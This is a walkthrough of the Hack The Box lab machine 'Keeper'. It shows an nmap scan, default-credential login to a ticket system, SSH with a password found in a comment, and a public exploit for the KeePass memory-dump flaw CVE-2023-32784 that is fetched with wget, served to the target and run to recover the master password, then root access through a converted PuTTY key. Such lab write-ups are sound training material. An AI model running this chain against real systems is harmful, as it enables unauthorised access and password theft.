This walktrough is about the "hacking" of the HTB box "Keeper"
sudo nmap -sV {IP}
What interests us here is the open TCP port 80. This port hosts an Nginx server that's up and running. So, we'll go ahead and check out this website. On the page, there's a text that points us to 'tickets.keeper.htb/rt/'. That's where we'll head next.
When we go to 'tickets.keeper.htb/rt/', this error message greets us. To bypass this error, we attempt to include the domain in our hosts file.
sudo nano /etc/hosts
After reloading the page, the website becomes visible!
Initially, my approach involved searching for potential CVEs. While I did come across a few, unfortunately, none of them proved to be useful for this particular box.
As a next step, I decided to give the default password a shot:
After conducting some tests within the ticket system, I managed to uncover this user:
I stumbled upon an interesting comment related to the user!
Thus, I decided to attempt an SSH connection using the following command:
ssh lnorgaard@10.10.11.227
That approach worked like a charm! Fantastic!
Additionally, I came across the 'user flag.txt' as well.
Within lnorgaard's ticket, I stumbled upon this intriguing message:
With the recent Keepass bug fresh in my mind, I began to search for potential avenues. After a brief investigation, I came across the CVE "CVE-2023-32784" and an existing functional exploit available at https://github.com/CMEPW/keepass-dump-masterkey.
To upload the PoC to the server, follow these steps:
-
Begin by downloading the script to your client machine using this command:
wget https://raw.githubusercontent.com/CMEPW/keepass-dump-masterkey/main/poc.py
-
Next, start an HTTP server on your local machine using:
python3 -m http.server
-
After that, you need to download the Python script to the HTB client with:
wget https://{YOUR VPNIP}:8000/poc.py
-
Finally, execute the Python script using:
python3 poc.py KeePassDumpFull.dmp
Running the script should produce the following output:
Since the obtained output isn't the actual password, we'll need to dig deeper to uncover the real password. Noticing that certain letters remain consistent, I'll focus on those.
To deduce the password, I've attempted a unique approach: replacing the special characters with '*' and using this modified pattern to search for clues online.
The initial search yields the result 'Rødgrød med fløde.' I'll proceed to test this phrase on the downloaded Keepass file.
Unfortunately, 'Rødgrød med fløde' didn't work. I'll now attempt the same phrase in full lowercase.
Once again, success! Great job!
In the Network category, a Putty SSH key for the root user is discovered. To use this Putty SSH key on Linux, it needs to be converted from the '.ppk' format to the '.pem' format. The conversion process can be achieved using the 'puttygen' package. It's important to create a separate file for each note in the Keepass, ensuring the entire note content is copied into the new file.
If the key file is named 'keeper.ppk', here's the command to perform the conversion:
puttygen keeper.ppk -O private-openssh -o htb.pem
Following the conversion, you can SSH to the server using the Linux SSH key:
ssh root@10.10.11.227 -i htb.pem
With this setup, you'll have access to retrieve the root flag!